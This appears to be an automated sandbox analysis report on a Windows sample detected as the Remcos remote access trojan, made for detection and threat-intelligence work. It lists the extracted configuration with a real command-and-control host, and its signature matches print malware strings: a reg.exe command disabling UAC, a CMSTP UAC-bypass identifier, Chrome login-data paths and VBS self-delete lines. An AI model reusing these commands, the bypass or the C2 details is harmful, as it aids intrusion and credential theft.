Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xi0TpAxHGMsm.exe

Overview

General Information

Sample name:xi0TpAxHGMsm.exe
Analysis ID:1435635
MD5:effe954da69f8377295e43c84e48bd77
SHA1:2cce76b35acab30714dcb56042808efbf05ae969
SHA256:950b538fcf4aa8021867bce803c551b098b1481fc9b468772efb81f51c4c1c8c
Tags:exeRemcos
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Snort IDS alert for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Deletes itself after installation
Installs a global keyboard hook
Machine Learning detection for sample
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • xi0TpAxHGMsm.exe (PID: 524 cmdline: "C:\Users\user\Desktop\xi0TpAxHGMsm.exe" MD5: EFFE954DA69F8377295E43C84E48BD77)
    • wscript.exe (PID: 7224 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Version": "4.9.3 Pro", "Host:Port:Password": "sendfiletiahforem.duckdns.org:8889:0", "Assigned name": "THIAGO-FULL", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4QQORA", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "Disk.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
xi0TpAxHGMsm.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
    xi0TpAxHGMsm.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      xi0TpAxHGMsm.exeWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x6aaa8:$a1: Remcos restarted by watchdog!
      • 0x6b020:$a3: %02i:%02i:%02i:%03i
      xi0TpAxHGMsm.exeREMCOS_RAT_variantsunknownunknown
      • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
      • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x64b6c:$str_b2: Executing file:
      • 0x65bec:$str_b3: GetDirectListeningPort
      • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x65718:$str_b7: \update.vbs
      • 0x64b94:$str_b9: Downloaded file:
      • 0x64b80:$str_b10: Downloading file:
      • 0x64c24:$str_b12: Failed to upload file:
      • 0x65bb4:$str_b13: StartForward
      • 0x65bd4:$str_b14: StopForward
      • 0x65670:$str_b15: fso.DeleteFile "
      • 0x65604:$str_b16: On Error Resume Next
      • 0x656a0:$str_b17: fso.DeleteFolder "
      • 0x64c14:$str_b18: Uploaded file:
      • 0x64bd4:$str_b19: Unable to delete:
      • 0x65638:$str_b20: while fso.FileExists("
      • 0x650b1:$str_c0: [Firefox StoredLogins not found]
      xi0TpAxHGMsm.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x6497c:$s1: CoGetObject
      • 0x64990:$s1: CoGetObject
      • 0x649ac:$s1: CoGetObject
      • 0x6e938:$s1: CoGetObject
      • 0x6493c:$s2: Elevation:Administrator!new:

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\Disk\Disk.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x134a8:$a1: Remcos restarted by watchdog!
            • 0x13a20:$a3: %02i:%02i:%02i:%03i
            00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                Click to see the 5 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.xi0TpAxHGMsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  0.0.xi0TpAxHGMsm.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    0.0.xi0TpAxHGMsm.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aaa8:$a1: Remcos restarted by watchdog!
                    • 0x6b020:$a3: %02i:%02i:%02i:%03i
                    0.0.xi0TpAxHGMsm.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x64b6c:$str_b2: Executing file:
                    • 0x65bec:$str_b3: GetDirectListeningPort
                    • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x65718:$str_b7: \update.vbs
                    • 0x64b94:$str_b9: Downloaded file:
                    • 0x64b80:$str_b10: Downloading file:
                    • 0x64c24:$str_b12: Failed to upload file:
                    • 0x65bb4:$str_b13: StartForward
                    • 0x65bd4:$str_b14: StopForward
                    • 0x65670:$str_b15: fso.DeleteFile "
                    • 0x65604:$str_b16: On Error Resume Next
                    • 0x656a0:$str_b17: fso.DeleteFolder "
                    • 0x64c14:$str_b18: Uploaded file:
                    • 0x64bd4:$str_b19: Unable to delete:
                    • 0x65638:$str_b20: while fso.FileExists("
                    • 0x650b1:$str_c0: [Firefox StoredLogins not found]
                    0.0.xi0TpAxHGMsm.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                    • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x6497c:$s1: CoGetObject
                    • 0x64990:$s1: CoGetObject
                    • 0x649ac:$s1: CoGetObject
                    • 0x6e938:$s1: CoGetObject
                    • 0x6493c:$s2: Elevation:Administrator!new:
                    Click to see the 5 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Script Interpreter Execution From Suspicious Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\xi0TpAxHGMsm.exe", ParentImage: C:\Users\user\Desktop\xi0TpAxHGMsm.exe, ParentProcessId: 524, ParentProcessName: xi0TpAxHGMsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , ProcessId: 7224, ProcessName: wscript.exe
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\xi0TpAxHGMsm.exe", ParentImage: C:\Users\user\Desktop\xi0TpAxHGMsm.exe, ParentProcessId: 524, ParentProcessName: xi0TpAxHGMsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , ProcessId: 7224, ProcessName: wscript.exe
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\xi0TpAxHGMsm.exe", ParentImage: C:\Users\user\Desktop\xi0TpAxHGMsm.exe, ParentProcessId: 524, ParentProcessName: xi0TpAxHGMsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , ProcessId: 7224, ProcessName: wscript.exe
                    Sigma detected: Use Short Name Path in Command Line
                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\xi0TpAxHGMsm.exe", ParentImage: C:\Users\user\Desktop\xi0TpAxHGMsm.exe, ParentProcessId: 524, ParentProcessName: xi0TpAxHGMsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , ProcessId: 7224, ProcessName: wscript.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\xi0TpAxHGMsm.exe", ParentImage: C:\Users\user\Desktop\xi0TpAxHGMsm.exe, ParentProcessId: 524, ParentProcessName: xi0TpAxHGMsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\yghndvikdwwpc.vbs" , ProcessId: 7224, ProcessName: wscript.exe

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: Registry Key setAuthor: Joe Security: Data: Details: BE D0 3E CA 0B 97 E1 38 5C B0 59 16 BB 2E ED A1 CF DA 98 35 50 51 7D 3C CD A1 1A AD 2D 8C 66 1D 07 F0 50 B4 20 B9 9D 12 33 07 B3 AF 63 FC 55 87 43 36 12 17 55 5C C3 1D 52 43 97 13 05 9D 54 B6 02 9E E9 E7 2B EF 96 17 FA 25 90 6E 91 81 1E 4E 53 F4 CA 8B B3 AB DA 12 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\xi0TpAxHGMsm.exe, ProcessId: 524, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-4QQORA\exepath

                    Snort Signatures

                    Timestamp:05/03/24-00:35:56.320861
                    SID:2032777
                    Source Port:8889
                    Destination Port:49700
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/03/24-00:35:56.084786
                    SID:2032776
                    Source Port:49700
                    Destination Port:8889
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: xi0TpAxHGMsm.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                    Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                    Found malware configuration
                    Source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpackMalware Configuration Extractor: Remcos {"Version": "4.9.3 Pro", "Host:Port:Password": "sendfiletiahforem.duckdns.org:8889:0", "Assigned name": "THIAGO-FULL", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4QQORA", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "Disk.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: xi0TpAxHGMsm.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\Disk\Disk.dat, type: DROPPED
                    Machine Learning detection for sample
                    Source: xi0TpAxHGMsm.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00433837
                    Source: xi0TpAxHGMsm.exe, 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_e5d48ee3-3

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: xi0TpAxHGMsm.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.xi0TpAxHGMsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1202223176.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: xi0TpAxHGMsm.exe PID: 524, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_004074FD _wcslen,CoGetObject,0_2_004074FD
                    Source: xi0TpAxHGMsm.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409253
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C291
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C34D
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409665
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0044E879 FindFirstFileExA,0_2_0044E879
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_0040880C
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040783C FindFirstFileW,FindNextFileW,0_2_0040783C
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419AF5
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB30
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD37
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407C97

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.7:49700 -> 85.60.29.68:8889
                    Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 85.60.29.68:8889 -> 192.168.2.7:49700
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: sendfiletiahforem.duckdns.org
                    Uses dynamic DNS services
                    Source: unknownDNS query: name: sendfiletiahforem.duckdns.org
                    Source: global trafficTCP traffic: 192.168.2.7:49700 -> 85.60.29.68:8889
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: UNI2-ASES UNI2-ASES
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\xi0TpAxHGMsm.exeCode function: 0_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0041B380
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: sendfiletiahforem.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: xi0TpAxHGMsm.exe, xi0TpAxHGMsm.exe, 00000000.00000003.1310007997.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000002.1353500932.000000000069E000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1302609981.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.0000000000702000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.0000000000702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp-
                    Source: xi0TpAxHGMsm.exeString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp7
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpI
                    Source: xi0TpAxHGMsm.exe, 00000000.00000003.1309821634.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1300373282.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1298720877.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1299993684.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1310649095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1297771861.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, xi0TpAxHGMsm.exe, 00000000.00000003.1231048351.00000000006DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpN
